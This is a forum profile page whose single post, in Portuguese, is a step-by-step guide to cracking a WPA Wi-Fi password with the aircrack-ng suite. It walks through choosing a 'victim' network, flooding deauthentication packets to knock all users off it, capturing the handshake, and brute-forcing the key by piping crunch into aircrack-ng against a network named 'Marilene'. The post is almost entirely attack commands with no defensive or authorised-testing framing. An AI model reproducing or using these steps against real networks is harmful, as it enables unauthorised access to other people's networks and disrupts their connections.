Jump to content

DanPHP7

Members
  • Content Count

    1
  • Joined

  • Last visited

Community Reputation

4 Neutral
  1. ----------------COLOQUE A PLACA DE REDE EM MODO DE MONITORAMENTO---------------- # airmon-ng start wlan0 ----------------MONITORE A REDE E ESCOLHA UM INDIVIDUO-------------------------- # airodump-ng wlan0mon # ^C ---------------COM O ALVO ESCOLHIDO -------------- # airdump-ng -c (channel da vitima) --bssid (bssid da vitima) wlan0mon -w --------------EM OUTRO TERMINAL ----------------- # aireplay-ng -0 100000(este e o numero de vezes que ele vai derrubar todo mundo da rede) -a (bssid da rede) wlan0mon --ignore-negative-one -----------------VOLTE AO PRIMEIRO TERMINAL E OBSERVE SE O HANDSHAKE FOI CAPTURADO--- [OBSERVE ESTA PRIMEIRA LINHA] CH 5 ][ Elapsed: 18 s ][ 2017-11-04 16:00 ][ WPA handshake: (bssid) O HANDSHAKE FOI PEGO PARE O ATAQUE DER DESAUTENTICACAO NO ULTIMO TERMINAL ABERTO # ^C -------------AGORA DIGITE ------------------ # crunch 8 10 1234567890abcdefghi|aircrack-ng '/root/marilene-01.cap' -w - -e Marilene os primeiros numeros deste comando sao para especificar o tamanho das senhas no caso de 8 ha 10 [e o tamanho das senhas os outros sao os caracteres usados para gerar as senhas [1234567890abcdefghi] o | é para inificar os comandos digite aircrak-ng o caminho do arquivo do handshake -w e - para informar a worlist, que vai ser gerada e testada ao mesmo tempo com o crunch e -e para especificar o ESSID da rede que nocaso se chama Marilene. espere e FIM -- by Carlos Daniel
×
×
  • Create New...

Important Information

By using this site, you agree to our Terms of Use.